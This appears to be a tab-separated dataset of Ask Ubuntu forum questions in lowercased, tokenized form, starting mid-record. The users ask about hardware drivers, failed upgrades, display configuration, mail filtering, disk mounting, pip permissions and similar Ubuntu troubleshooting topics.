] hid-generic 0003:046d : c077.0019 : input , hidraw0 : usb hid v1.11 mouse [ logitech usb optical mouse ] on usb-0000:00:1a.0-1.1/input0 aug 18 09:29:59 engine- kernel : [ 2092.409613 ] usb 1-1.1 : usb disconnect , device number 8 aug 18 09:30:00 engine- kernel : [ 2093.690148 ] usb 1-1.2 : usb disconnect , device number 4 update i also meet a situation : there is a kernel call trace in monitor , keyboard ca n't response , only can reboot . but after reboot the syslog and kern.log does n't have the kernel calltraceă
512528	file/directory compare with right click in thunar / xubuntu	i would like to be able to compare files or directories by multiple-selecting them and then right clicking ( for example , if there was a `` compare '' option in the context menu ) . on ubuntu with nautilus , i would install the package nautilus-compare . how can i get this ability in xubuntu ? ( in thunar in xubuntu - i do n't mean by installing nautilus ) the comparison program i use is meld , but a general answer would be most useful .
512529	port 8000 unreachable in ubuntu vm	i 'm trying to connect with predictionio in a ubuntu virtual machine ( running on virtual box ) . but when i try to connect with : bin/start-all.sh i get this error : 8000 unreachable i already checked localhost:8000 in my browser and nothing shows up . how can i turn this port free to run predictionio ?
512530	no network traffic is being measured	i just completely cleaned my computer and installed ubuntu 14.04 . before , i used ifstat under ubuntu 12.04 to measure my network traffic in the command line . however , now that i installed ifstat under ubuntu 14.04 , it only states that there is zero activity , even while i 'm running speedtest.net . running ifstat -a , i get the lo and eth0 interfaces , showing only zero activity . i do not have a wireless interface . alternatively , i tried to monitor the network traffic by means of nload , but it also states that there is zero activity on the eth0 and a bit on lo , but definitely the bandwidth speedtest.net uses . also in system monitor , no network activity is detected , as can be seen on the added screenshot .
512531	nepali keyboard layout help in ubuntu	how to write गर्दै ni nepali using nepali keyboard ? when i type gr/d { it shows गर्दई but i want गर्दै . please guys help me to find out the problem .
512534	dell latitude d630 wifi driver needed	i have downloaded ubuntu 14.04 on my dell latitude d630 . i am in extreme need of the driver for my machine . i cant seem to find .
512535	ca n't upgrade from 12.04lts to 14.04lts	i am trying to upgrade to 14.04.1 lts . it is showing : you have to download a total of 137 k. this download will take about 4 seconds with your connection . installing the upgrade can take several hours . once the download has finished , the process can not be canceled . continue [ yn ] details [ d ] d continue [ yn ] details [ d ] y fetched 0 b in 0s ( 0 b/s ) could not download the upgrades the upgrade has aborted . please check your internet connection or installation media and try again . all files downloaded so far have been kept . failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/g/gcc-defaults/libgcj-common_4.8.2-1ubuntu6_all.deb 403 forbidden restoring original system state aborting ...
512537	evince performance ( hint : slow )	is it normal that evince is really slow with pdf documents with pictures and larger than 10 mb ? instead of loading the whole document and then being able to scroll fast i always get slow page-preview-scrolling and slow document scrolling . even pages i have scrolled to before in one session have to be constantly reloaded . is this normal ? is there a way to improve this ? update 1 : i do n't have any other performance issues in other applications ( e.g . gimp , inkscape , qgis ) . i have a laptop with a intel core i3-3120m cpu @ 2.50ghz ă 4 , but only 4 gb of ram . is that not enough ram for ubuntu 14.04 and evince ? update 2 : both qpdfview and mupdf are really fast ( instantaneous ) in document scrolling and page-preview-scrolling . i will try to reinstall evince or find a ppa for a newer version and update the question after those steps . update 3 : reinstalling has n't helped even from the gnome ppa . i guess i will have to wait for one of these bugs to be dealt with : https : //bugzilla.gnome.org/show_bug.cgi ? id=732053 https : //bugzilla.gnome.org/show_bug.cgi ? id=645796
512539	screen flicker present in all operating systems after error in ubuntu touch [ nexus 7 2012 wifi ]	i installed ubuntu touch stable 10 with multirom . when i swiped from left to right ubuntu froze and the screen started to flicker . i have removed ubuntu touch and still have the stock android 4.4.4 rom and cyanogen 10.2 custom rom . the screen flickers in both of these roms now . most notably when i swipe down the notifications tray and the home screen darkens ( or any other time parts of the screen darken ) . did ubuntu touch damage my devices hardware when it crashed ? is there some kind of cache that needs to be cleared to fix this ?
512540	haunted trackpad pointer when hard drive is active	i recently installed ubuntu 14.04 on an hp compaq nc6400 i am rehabbing , in order to test the machine . the hard drive i installed into the computer worked fine and had windows vista loaded on it . upon loading ubuntu onto the machine the pointer for the touchpad started acting erratically . it tends to pull to the upper left of the screen . i have been checking forums for a series of hours already , and tried a series of fixes already and none of them have worked . during this process i started to notice that the pull only happened when the hard drive activity indicator light is on . this seems to lead to the conclusion that the problem has something to do with the magnetic energy being generated by the hard drive in relation to the trackpad , but that conclusion is problematic due to the perfect functioning of the trackpad pointer when the computer was running vista . can someone possibly lead me to some possible solution to this problem ?
512543	setcap cap_net_raw+ep wine	i am using ubuntu gnome 14.04.1 with bumblebee and nvidia-331 as graphic driver and wine 1.7.22 . i am having the problem that using sudo setcap cap_net_raw+ep /usr/bin/wine has the side effect ( ? ) that programs in wine are n't able to initialize opengl anymore . e.g . when trying to run warcraft iii : fixme : exec : shell_execute flags ignored : 0x00000100 fixme : exec : shell_execute flags ignored : 0x00004100 p11-kit : could n't load module : /usr/lib/i386-linux-gnu/pkcs11 /gnome-keyring-pkcs11.so : /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so : can not open shared object file : no such file or directory err : ole : cocreateinstance apartment not initialised err : wgl : has_opengl failed to load libgl : libgl.so.1 : can not open shared object file : no such file or directory err : wgl : has_opengl opengl support is disabled . fixme : win : enumdisplaydevicesw ( ( null ) ,0,0x33f5a8,0x00000000 ) , stub ! fixme : win : enumdisplaydevicesw ( ( null ) ,0,0x33f5d8,0x00000000 ) , stub ! fixme : msvcrt : __clean_type_info_names_internal ( 0x150591a0 ) stub can anyone tell me what causes this bug and how to fix it ? is it even a bug ? i just do n't understand how adding the permission to create sockets can effect my graphic driver .
512544	configure android access for adb device - samsung galaxy tab 4 ( 7 in . )	-- upd -- i forgot settings / dev options /usb debugging = true ... that solved it . issue - adb devices shows blank list on the tab-4 , when connected to pc , it does show usb symbol on sts bar `` connected as media device '' lsusb | grep -i samsung bus 001 device 007 : id 04e8:6860 samsung electronics co. , ltd gt-i9100 phone ... grep '04e ' /etc/udev/rules.d/51-android.rules subsystem== '' usb '' , attr { idvendor } == '' 04e8 '' , attr { idproduct } == '' 6860 '' , mode= '' 0600 '' , owner= '' rob '' subsystem== '' usb '' , attr { idvendor } == '' 04e8 '' , attr { idproduct } == '' 685c '' , mode= '' 0600 '' , owner= '' rob '' cat ~/.android/adb_usb.ini # ... 0x04e8 adb devices list of devices attached < -- just blank list note : never have seen a case where the device thinks that its connected and the pc does not see anything at all ? system env : os 12.04 kernel upd : 3.7.5-030705-generic background - have a dev issue ( inadvertent rotation on bitmaps , only on tab4 ) and dont know how im gon na find it without being able to connect !
512545	how to run a command without keyboard ?	i am wondering if it is possible to run a command without keyboard . actually , i would like to run dmesg and save the output into a text file . i have written previously a bash script which does the job , and without keyboard i can log in to the guest account , but i can not run the script . even if i make it executable , it does n't run if i double-click on it . so , is there a way to run a command or a script without using keyboard ?
512554	after upgrading to 14.04 arrow down does n't work / action seems to be wrongly assigned on xserver	after upgrading to 14.04 ( from 12.04 ) the down arrow is not working properly anymore on graphical system . on console the key works fine , but not on terminal ( within x ) . unfortunately i did n't found the answer by searching on internet , maybe i 'm looking for the wrong tags/ key words . however , i found some hints to check the button behavior with xev . the result of the key sequence arrow left , up , right and down is shown here : keypress event , serial 37 , synthetic no , window 0x3800001 , root 0x283 , subw 0x0 , time 141793 , ( -397,1002 ) , root : ( 390,1054 ) , state 0x0 , keycode 113 ( keysym 0xff51 , left ) , same_screen yes , xlookupstring gives 0 bytes : xmblookupstring gives 0 bytes : xfilterevent returns : false keyrelease event , serial 37 , synthetic no , window 0x3800001 , root 0x283 , subw 0x0 , time 141974 , ( -397,1002 ) , root : ( 390,1054 ) , state 0x0 , keycode 113 ( keysym 0xff51 , left ) , same_screen yes , xlookupstring gives 0 bytes : xfilterevent returns : false keypress event , serial 37 , synthetic no , window 0x3800001 , root 0x283 , subw 0x0 , time 142807 , ( -397,1002 ) , root : ( 390,1054 ) , state 0x0 , keycode 111 ( keysym 0xff52 , up ) , same_screen yes , xlookupstring gives 0 bytes : xmblookupstring gives 0 bytes : xfilterevent returns : false keyrelease event , serial 37 , synthetic no , window 0x3800001 , root 0x283 , subw 0x0 , time 142949 , ( -397,1002 ) , root : ( 390,1054 ) , state 0x0 , keycode 111 ( keysym 0xff52 , up ) , same_screen yes , xlookupstring gives 0 bytes : xfilterevent returns : false keypress event , serial 37 , synthetic no , window 0x3800001 , root 0x283 , subw 0x0 , time 149744 , ( -397,1002 ) , root : ( 390,1054 ) , state 0x0 , keycode 114 ( keysym 0xff53 , right ) , same_screen yes , xlookupstring gives 0 bytes : xmblookupstring gives 0 bytes : xfilterevent returns : false keyrelease event , serial 37 , synthetic no , window 0x3800001 , root 0x283 , subw 0x0 , time 149895 , ( -397,1002 ) , root : ( 390,1054 ) , state 0x0 , keycode 114 ( keysym 0xff53 , right ) , same_screen yes , xlookupstring gives 0 bytes : xfilterevent returns : false focusout event , serial 37 , synthetic no , window 0x3800001 , mode notifygrab , detail notifyancestor focusin event , serial 37 , synthetic no , window 0x3800001 , mode notifyungrab , detail notifyancestor keymapnotify event , serial 37 , synthetic no , window 0x0 , keys : 4294967171 0 0 0 0 0 0 0 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 keyrelease event , serial 37 , synthetic no , window 0x3800001 , root 0x283 , subw 0x0 , time 150559 , ( -397,1002 ) , root : ( 390,1054 ) , state 0x0 , keycode 116 ( keysym 0xff54 , down ) , same_screen yes , xlookupstring gives 0 bytes : xfilterevent returns : false as you may see , the arrow down behavior is different , but does anyone know how to fix it ?
512555	list usernames/machine name for display-less machine	i have a display-less machine ( faulty vga ) i am trying to ssh to over my local network by doing something like ssh username @ machinename.local as described in this solution . i know the password for the username . however , i do not know for sure the username and machine name that are already set up ; i have never been able to see the display . is there a way to access this information from another computer , perhaps via my laptop over the local network ?
512556	installing software in ubuntu	when i tried to install vlc from software center there is '' use the source '' instead of `` install '' ; by clicking the use the sources option its not installing using the terminal i tried , but its showing : reading package lists ... done building dependency tree reading state information ... done e : unable to locate software package ( vlc ) i update but nothing changed there is no synaptic manager too ...
512557	wi-fi enable is not working	i have installed ubuntu on my lenovo t410 , but the enable wi-fi is grayed out ? i can not connect to the internet
512562	not able update anything or use ubuntu service centre	error that i get wen trying to check for updates:0 w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/quantal-security/restricted/source/sources 404 not found [ ip : 91.189.88.149 80 ] , w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/quantal-security/main/source/sources 404 not found [ ip : 91.189.88.149 80 ] ,
512564	missing x-spam-status header	i recently upgraded to ubuntu 14.04.1 lts ( trusty ) and have followed the directions in https : //help.ubuntu.com/14.04/serverguide/mail-filtering.html and am sending and receiving mail just fine . while i do see x-virus-scanned headers in my messages , which suggests mail is indeed being processed , i do not see any x-spam-level or x-spam-score headers being added to messages . this makes downstream procmailrc and client-side filtering ... more difficult . while having $ final_spam_destiny = d_discard in /etc/amavis/conf.d/20-debian_defaults does greatly reduce spam to my inbox , i had concerns of false-positives prior to tuning and did n't know were there going , so have set it to d_pass for the time being . this exposed the problem . i 'm not sure where to look to start diagnosing the problem ( otherwise i 'd post a suspect configuration file ) . /etc/amavis/conf.d/15-content_filter_mode has the lines uncommented to enable virus and spam checks , and virus checking appears to be working according to the headers . spam assassin certainly seems to be starting just fine , too . spamassassin debug facilities : info sa info : zoom : able to use 360/360 'body_0 ' compiled rules ( 100 % ) spamassassin loaded plugins : askdns , autolearnthreshold , bayes , bodyeval , check , dkim , dnseval , freemail , htmleval , httpsmismatch , hashcash , headereval , imageinfo , mimeeval , mimeheader , pyzor , razor2 , relayeval , replacetags , rule2xsbody , spf , spamcop , uridnsbl , uridetail , urieval , vbounce , wlbleval , whitelistsubject spamcontrol : init_pre_fork on spamassassin done i 've also set $ log_level = 2 ; in /etc/amavis/conf.d/50-user and do n't see any obvious errors rolling by in the logs . q : any recommendations of what to try next ? update ( it appears that i have the right setting already ) : /etc/amavis/conf.d $ grep sa_tag_level_deflt * 20-debian_defaults : # $ sa_tag_level_deflt = 2.0 ; # add spam info headers if at , or above that level 20-debian_defaults : $ sa_tag_level_deflt = -999 ; # add spam info headers if at , or above that level
512565	how to reset nautilus launcher icon shortcuts to default	after an update i ended up with this : how can i add the default options which are not bookmarks ( documents , downloads , music ... ) the same happened to nautilus when i opened it , but i added the options in ~.config/user-dirs.dirs but now the launcher icon is missing this options .
512567	how can i get belkin wireless adapter n450 db/n600 db to work on ubuntu 14.04 64-bit ?	i am new on this ... this is what i get when execute lsusb command : zheko @ zheko-fx6800-01e : ~ $ lsusb bus 001 device 004 : id 050d:110a belkin components ... any help would be greatly appreciated . thanks !
512568	thunderbird does not wrap text in 14.04	in 14.04 , i notice that while composing thunderbird has stopped wrapping text , and it is annoying to have to use to 'enter ' to see the whole mail on screen without having to scroll horizontally ! ! i do n't know where to set wrap text after xx ( 72 ? ? ) characters in thunderbird
512571	mouse / keyboard not working on ubuntu , stuck at login	just installed ubunutu , completely new to using linux myself . should be running the latest version as i selected to download updates on install . mouse : logitech 848nm wireless mouse - works on windows 7 computer/worked on installing ubuntu before reboot . keyboard : compaq model no l101 p01 - wired with old ps/2 port . also works on win7/installing before reboot . it also works on startup so i can press function keys if i recall correctly . any help is appreciated !
512572	restoring backup on new computer	i have been following this tutorial for backup/restore of ubuntu server : http : //ubuntuforums.org/showthread.php ? t=35087 i have a dedicated server and in case i have to restore the whole server on a new machine , i 'm practicing using a virtual machine in vmware . i 've managed to restore all the files by doing an untar of the backup . however i ca n't get apache to start : could not reliably determine the server 's fully qualified domain name using 127.0.1.1 for servername and the apache error log may have more information . the problem is that there is no logs since i 've excluded them from the backup . do i need to first install apache and then untar the backup ? is this the proper way to restore the server ? i have some doubts because things like ip address and host name would be different if i create a new dedicated server , so there is potentially a significant number of files that would need to be updated . is there a recommanded way to do that ?
512581	connect 2nd vpn with network manager	currently , as i connect 1 vpn with network manager , the others become greyed-out . i might be mistaken , but i think that back in days i could chain vpns this way ... or , is ppp my only option ?
512584	how to install eclipse .tar.gz with dual boot at windows ?	i am new to ubuntu and want to learn how to install the software .i downloaded .tar.gz file file and i have no idea what to do with it . let me tell you that i use dual boot ubuntu with windows and i have stored in d drive suggest me what to do ? i had downloaded the non source file of eclipse . the answered question is confusing and not for dual boot if you do not know the answer just say it , do n't mark duplicate or delete post .
512586	ubuntu does not login after resizing partitions with gparted	i recently needed to enlarge the windows 7 partition on my laptop and shrinked with gparted the one in which i have ubunt . the problem is that now , after logging in , my desktop does not activate and i nothing except the mouse pointer . nevertheless my data are still there , this i checked by logging in after doing ctrl+alt+f1 is there a way in which i could just backup and reinstall everything without loosing my previous data ? bests !
512587	backup finishes but does not backup /home/username/.dbus	i 'm unsure what .dbus is and why this error appears at the end of each backup . it says : backup finished could not back up the following files . /home/username/.dbus how can i fix it ?
512588	no downloads , documents , ... folders in home folder after installing dvsdk	today i have installed dvsdk package in home folder . for installing i have changed the mode using chmod 777 and executed ./ [ package_name ] ... after that , it asks where to install , i chose home directory . it has almost installed everything in home directory . for some reason , i have canceled the installation process . after that i 'm not able to see downloads , documents , music , pictures , video folders in home folder . only that file system is accessible ... please anyone tell me a solution .
512591	problems with external harddrive ( usb 2.0 )	i recently installed ubuntu 14.04 . lts on a compaq presario cq 60 . after having a few problems , i managed it to run more or less stable ( freaking nvidia problems are more or less resolved by using gnome flashback instead of unity ) . i copied about 40 gb of music and 15 gb of pictures etc . on a external hard drive ( 2.0 ) - backing it up ( still using vista ) worked fine and acceptably fast . so the laptop definitely has 2.0 usb ports and i am using the correct cable . however : trying to copy the files back to the laptop seems to be a massive problem . firstly , it is really slow . second , it keeps crashing , giving me the following message : error while copying `` filename '' - error splicing file : input/output error then the hard drive comes up again ( opens in a new window ) as if it loses connection and then get 's recognized again . i can skip the file , but then it still keeps going on with about 2-3 mb/sec . i am fairly new to ubuntu - but this should work better , right ?
512594	only resolve dns on vpn server	i installed pptpd but my connection is too slow and i need use google dnses ( 8.8.8.8,8.8.4.4 ) on my android without root for mobile network ( not wi-fi ) . how can i configure my ubuntu server for just resolve dns on vpn ? best regards .
512597	setting up opengl development using lwjgl	i recently switched from windows 7 to ubuntu 14.04 lts , while running a project of mine through netbeans i encountered : org.lwjgl.lwjglexception : x error - disp : 0x7f3c601e80c0 serial : 93 error : glxbadfbconfig request_code : 155 minor_code : 34 at org.lwjgl.opengl.linuxdisplay.globalerrorhandler ( linuxdisplay.java:321 ) at org.lwjgl.opengl.linuxcontextimplementation.ncreate ( native method ) at org.lwjgl.opengl.linuxcontextimplementation.create ( linuxcontextimplementation.java:51 ) at org.lwjgl.opengl.contextgl. < init > ( contextgl.java:132 ) at org.lwjgl.opengl.display.create ( display.java:850 ) at org.lwjgl.opengl.display.create ( display.java:797 ) at lwjgl.lwjgl.setupdisplay ( lwjgl.java:82 ) at lwjgl.lwjgl.start ( lwjgl.java:17 ) at lwjgl.lwjgl.main ( lwjgl.java:70 ) i 'm running opengl version 3.0 . i 've tried updating opengl with no success . i installed freeglut3-dev and freeglut3 but i 'm unsure on how to incorporate that into my project . i 've read these are the two packages i need to use opengl without getting errors . how do i update/use opengl on ubuntu using the lwjgl library . what proper packages do i need to install and how do i incorporate that into my development ide i 've also heard mention of bumblebee ... ? my graphics card is up to date and supports opengl and 3d .
512601	i installed ubuntu 14.04 lts and have problems with the password	in the installation process i choose to boot without a password ( automatically ) .it works fine . but when i try to install software over the software-center i 'm beeing asked for a password . but i have no password . what can i do ?
512607	ubuntu for lg g2 d802	i got some questions , 1 is there full version of this operating system for my device ? 2 i 'm interested on games and can i install apk applications as in android jelly bean or kit-kat ? if not , which extension of app is exist ? snap dragon 800 2 gb ram 2 26 ghz qualcomm and one more thin will knockon function work because its very comfortable . oh i almost forgot : what about remote ? and guest mode ?
512608	ubuntu crashes when resuming from standby	my system crashes everytime it tries to resume from standby . thats more than annoying . unfortunetely i ca n't see anything in the logs that seems related for me . any ideas what causes the crash ? which logs do i need to search to determine the reason ? i 'm running a desktop machine with ubuntu 14.04 , intel i5 with on board graphics . thanks in advance !
512612	how to blanket change scaling of ui elements ?	i have a large but not especially high resolution display . i do n't want to change the font sizes , but rather i want to change how large everything appears other than text . i want to know how to do this on both unity and kde , as i use both very often . i know more or less how to do it for most things on kde , but i do not know how to change the size of buttons and menus . on unity i know how to change the size of the dockbar , but not the top bar or anything else pretty much , except for text which i do not want to change the size of .
512613	in 14.04 how do i separate the titlebar from the top bar ?	please excuse me if this is a duplicate . if it is i was not able to find one . i want to know how i can separate the top bar from the titlebar and have it so when a window is maximised the buttons do not appear above the unity dock . in fact i actually want to eliminate the top bar altogether aside from the notifications , which i would like to move to the bottom of the screen if possible . how would i go about doing this ?
512615	best route to take for a confirmed , unassigned bug ?	there is a bug that is potentially a security threat and has remained confirmed , unassigned since it was created in mid-july . i can appreciate that the ubuntu developers are very busy , so i 'm wondering if there is any way to increase exposure to the bug ? fyi , the bug is bug # 1341320 , and i have already asked a question about it . this question is more generally about the bug reporting/fixing process .
512616	multiple monitors detect add remove laptop auto change nvidia x server settings	physical setup ; 4 monitors , 1 laptop , 1 hdmi switch box , 1 graphics card used for all 4 displays . monitors listed in nvidia x server settings as ; crt-0 , dfp-1 , dfp-3 , dfp-4 . short description of problem ; start linux . if needed goto nvidia x server settings and arrange 4 monitor screens . save configuration . laptop is displayed on laptop 's own built in monitor . use hdmi switch box , laptop is now displayed on 'main ' [ dfp-1 ] monitor . 3 remaining monitors change to 'alternative ' nvidia x settings 'a ' . use hdmi switch box , laptop is now displayed on laptop 's own built in monitor . 4 monitors change to 'alternative ' nvidia x settings 'b ' . the good bit ; boot or reboot linux with laptop display on it 's own built in monitor . everything is layed out nicely . specifically the task bar is shown on 'main ' [ dfp-1 ] monitor and monitor [ dfp-3 ] has orientation as rotate left . settings are not lost on reboot . long description of the problem ; use hdmi switch box . 1 . dfp-1 is no longer connected to linux machine . 2 . dfp-1 now shows what was displayed on laptop 's own built in monitor . 3 . crt-0 now has task bar . 4 . crt-0 now shows what was being displayed on dfp-1 . 5 . dfp-3 orientation is now normal , orientation is no longer rotated left . 6 . dfp-3 now shows what was being displayed on dfp-3 . 7 . dfp-3 additionally shows what was being displayed on dfp-1 on top . 8 . dfp-4 remains unchanged . notes . 7. what i mean here is say i had chrome web browser open on dfp-1 and skype on dfp-3 . after using the switch box , skype would still be shown on dfp-3 but over the top would be the chrome web browser . wished for / wanted / desired behaviour ? linux to use 2 nvidia x server settings . one setting for when dfp-1 is present and another for when it is not present . is there a way to ; a. detect dfp-1 state , connected , disconnected , reconnected ? b. have 2 or more nvidia x server settings configuration files ? c. change between nvidia x server settings configuration files 'on the fly ' ? hopefully i have outlined the problem i am experiencing adequately , with enough information , that someone , with the ability to provide a solution , can understand it . in other words , can anyone who can help me , please ? side note what is with the need to use html to correctly format a question ? is it some sort of test ? totally unnecessary , elitist , off putting behaviour .
512617	ubuntu 12.04 can not start after installing bumblebee	my laptop is dell n5110 . it has 2 graphic cards : intel and ndivia . yesterday i installed bumblebee . after installing and reboot , my laptop can not start anymore . i get some error messages on my screen as shown below : 0.481741 ] [ < ffffffff81663e75 > ] pagefault+0x25/0x30 0.481817 ] [ < ffffffff81033c97 > ] ? __ioapic_write_entry+0x47/0x70 0.481895 ] [ < ffffffff81033f11 > ] ioapic_write_entry+0x41/0x70 0.481973 ] [ < ffffffff81035942 > ] setup_ioapic_irq +0x1e2/0x2d0 0.482051 ] [ < ffffffff81035ab0 > ] io_apic_setup_irq_pin+0x80/0xe0 0.482131 ] [ < ffffffff8103701d > ] io_apic_setup_irq_pin_once+0x4d/0x70 0.482210 ] [ < ffffffff81037094 > ] io_apic_setup_pci_routing+0x34/0x70 0.482289 ] [ < ffffffff8152f2a5 > ] pirq_enable_irq+0x155/0x240 0.482367 ] [ < ffffffff8152f529 > ] pcibios_enable_device+0x39/0x40 0.482446 ] [ < ffffffff81338743 > ] do_pci_enable_device+0x53/0xe0 0.482523 ] [ < ffffffff81338878 > ] __pci_enable_device_flags+0xa8/0xf0 0.482601 ] [ < ffffffff813388d3 > ] pci_enable_device+0x12/0x30 0.482677 ] [ < ffffffff81333748 > ] pci_enable_bridges+0x48/0x60 0.482756 ] [ < ffffffff81d2b10b > ] pci_assign_unassigned_resources+0xf10/0 0.482833 ] [ < ffffffff813f72f7 > ] ? put_device+0x17/0x20 0.482910 ] [ < ffffffff8116512b > ] ? kfree+0x3b/0x140 0.482987 ] [ < ffffffff8133bbba > ] ? pci_get_subsys+0x8a/0xc0 0.483063 ] [ < ffffffff81d3bae5 > ] ? pcibios_allocate_bus_resources+0x8d/0 0.483143 ] [ < ffffffff8133bb57 > ] pcibios_assign_resources+0x72/0x76 0.483222 ] [ < ffffffff81002040 > ] do_one_initcall+0x40/0x180 0.483300 ] [ < ffffffff81cfccf8 > ] kernel_init+0xe5/0x169 0.483377 ] [ < ffffffff8166deb4 > ] kernel_thread_helper+0x4/0x10 0.483457 ] [ < ffffffff81cfcc13 > ] ? start_kernel+0x3c2/0x3c2 0.483534 ] [ < ffffffff8166deb0 > ] ? gs_change+0x13/0x13 after that my computer was stuck there . even ctrl + alt + del does not help to restart . i need to press the power button to shut it down . i tried to restart with recovery mode but the same errors appeared on the screen and my computer again was stuck there . please help me ! thank you !
512618	trying to mount drive /dev/sdc : type= '' nvidia_raid_member ''	i just installed ubuntu 14.04 this weekend . here is my setup : 128gb ssd = win7 128gb ssd = ubuntu 14.04 500gb seagate barracuda = files , music , photos , etc for some reason the ssd with win7 is already mounting automatically . i need to mount my `` data '' drive . from what i read i need to find out the uuid of the drive . but when insert sudo blkid -c /dev/null i get : /dev/sda1 : uuid= '' 6c761ac0761a8b4a '' type= '' ntfs '' /dev/sdb1 : uuid= '' 25b325e9-3f4a-4406-9a0d-ca51c364f287 '' type= '' swap '' /dev/sdb5 : uuid= '' e685ce58-9a19-431b-bf26-39f5b68a1515 '' type= '' ext4 '' /dev/sdc : type= '' nvidia_raid_member '' the drive i want to mount is /dev/sdc . a looong time ago i used it with his `` twin brother '' in raid , he died . so i just reformatted it . apparently it still is configured for raid . i did some research and found ( on a old post ) that if i use sudo dmraid -e -r /dev/sdc the raid mark will be removed . since i have data on it i wish to know if this will wipe it or if there is another way around . ( maybe mounting without removing raid ) ? update : i did the sudo fdisk /dev/sdc then p and it gave me this : disk /dev/sdc : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xa15239e4 this does n't look like a partition table probably you selected the wrong device . device boot start end blocks id system /dev/sdc1 ? 2048 976769023 488383488 7 hpfs/ntfs/exfat may i proceed ?
512621	unable to get audio through hdmi connection to tv with ubuntu 14.04	i 'm having trouble getting audio through my tv which is connected via hdmi . the item is available ( hdmi / displayport 2 ) via sound settings , but it does n't play any sound . i 'm able to get the volume when logged in to windows on the same setup . i 've tried updating my graphics card drivers through software & updates > additional drivers to nvidia binary driver - version 331.38 from nvidia-331-updates ) i 've done a couple of the things listed here : ubuntu refuses to output audio via hdmi ( installed pavucontrol , did the sound test on the highest voted answer ) , but they seem to be related to not even seeing the device listed , whereas i have the device listed i just ca n't get any sound . when i play through speakers - build-in audio it works
512622	replacing zorin os 8 with ubuntu 14.04	i was trying to replace zorin os 8 with ubuntu 14.04 ( 32 bits ) . what i have tried : i took an empty pen drive and downloaded ubuntu 14.04 iso file on to this pen drive . i then restarted my laptop ( lenovo n 3000 ) and pressed f12 i then selected the usb drive in the boot options . after sometime i got the zorin flash screen again . i know i am `` fundamentally '' wrong in the manner how i am executing this installation process . if you could please provide me a stepwise instruction .
512623	how to run python program installed system-wide through pip without root privileges ?	i have two different ubuntu computers that both has multiple user accounts . i wanted to try the latest version of the backup program attic , so i used pip3 to install it—with success . however , i can’t run the program as a normal user . if i do a local installation with pip3 -- user , the program works as expected . but since i have multiple users , it would be too cumbersome to handle multiple local installations . i’d like to have one system-wide installation with normal users being able to run the program . i’m guessing this is about permissions . how would one allow pip3-installed packages , that aren’t local installations , to be used by regular users—i.e. , without using sudo or the root account ? edit : it seems that i’ve made it work , although my solution feels very hacky , and i don’t know if it’ll it doesn’t survive a package update . i carefully examined the file path leading up to /usr/local/lib/python3.4/dist-packages/attic and used chmod for giving the “other” group appropriate permissions , since they had none ! i also used chmod on the individual py-files , giving them 644 . i’ll let the question be open since there surely must be another , better way . one thing leads to another ... i have apparently , some time ago , changed the default umask to 007 . i have no idea if that’s the cause of the issue at hand , but i think it could be . i don’t want to change the value back to find out , since i quite like the privacy the current value gives . i think i’ll just write a shell script that sets the correct permissions for all the attic files ( i.e . allowing “others” r and in some cases x ) , and then create an alias like sudo pip3 install -- upgrade attic & & sudo ~/.local/bin/fix-attic-permissions in ~/.bashrc .
512625	login sound not working in ubuntu 14.04 after a update	i installed ubuntu 14.04 the login sound was working but now for the past 2 weeks it is not working i have tried using ubuntu tweak today to turn off the login sound and turn it back on but it did not do the job . i am using ubuntu 14.04 intel i3 asus b85m-g motherboard 8 gb ram ddr3 ( no video card no sound card ) and btw the login sound stop working after a update but you-tube is working fine but ubuntu is hanging some times also i guess the update has a bug is my ubuntu system getting slow ? ? now i donât know what to do should i just wait for ubuntu to let a new update to fix the bug ? ? and i have updates install everyday . plz help ! ! ! !
512633	strange audio noise ( clicking ) during log on / off to desktop	any time i boot up xubuntu , the speakers are turned on , immediately after entering the password and hit enter , there is a strange clicking from the speakers .. almost as if it was a sound effect for the session started.. suggestions ?
512637	mouse cursor drift problems 14.04 ubuntu	i am posting a question to learn if anyone is having similar cursor ( mouse cursor ) drift problems . i have seen where this can be a problem with dell laptops and such but i have a toshiba tecra m5 . i have disabled the touchpad within ubuntu . i am unable to access the cmos to check to see that it is disabled there . i have a bit of a booting problem that recently surfaced . i think the booting problem is a hardware problem . i have some very old hardware . the mouse problem continues when using multiple dell mice , all standard and corded . i have most recently begun using a wireless logitech and the problem has improved but still does exist . at least now the mouse does n't stay on the side of the screen sometimes but it still moves a lot when the hardware does n't move . this problem is similar : mouse snapping back to upper right hand corner
512638	ubuntu just wo n't work on my pc .	i burnt so many different isos of different ubuntu versions , and no matter what there was always the same problem . when grub would load up , i select ubuntu , all i ever get is a black screen . i 've tried probably everything : nomodeset , changing additional drivers , updating drivers , take your pick . no matter what it just always gave me a black screen . the only thing that worked was running in recovery mode , and when i downloaded an old wubi but even then i could n't download anything so i had to uninstall . any insight on this ?
512639	what type of gui to ubuntu exists ?	please i want to install many interfaces 多can you help me ? with links ...
512641	trying to mod ubuntu to run 1 program instead of the desktop manager	i am fairly new to linux and ubuntu , so please bear with me ... i will probably sound very windows oriented since that is what my background is in . i am trying to build a computer based lighting console for a charity organization , and i have everything setup using qlc+ and ubuntu , but i want to set it so that once the volunteers log in , it does not load the desktop , rather it goes straight into qlc+ , and even if closed does not load the desktop . there are a number of reasons for that , the first is security . since this organization is 100 % volunteer run , i do n't want anyone messing with the os once i have everything configured . the second reason is to reduce overhead , but that is n't as important to me as the security aspect . i know in windows , i could simply create a batch script that starts qlc+ , and modify the registry entry at : hkcu\software\microsoft\windows nt\current version\winlogon\shell to point to the batch file instead of explorer.exe , but i 'm pretty sure that ubuntu will work better for this project than windows will ; even though qlc+ is cross platform . here 's what i have so far in my attempts to do this on my own : 1 . i can put a new startup entry in ubuntu 's startup applications preferences with the command : qlcplus -- open % f , and it opens qlc+ along with the desktop manager . 2 . i have tried replacing the ubuntu.desktop file in /usr/share/xsessions with a file containing the following : [ desktop entry ] type=application exec=qlcplus -- open % f terminal=false name=wscc lighting console when i startup the computer with that configuration , it logs in with the gui , but just sits and does n't load qlc+ . 3 . since when i open a terminal session in that state and run startx , it opens just 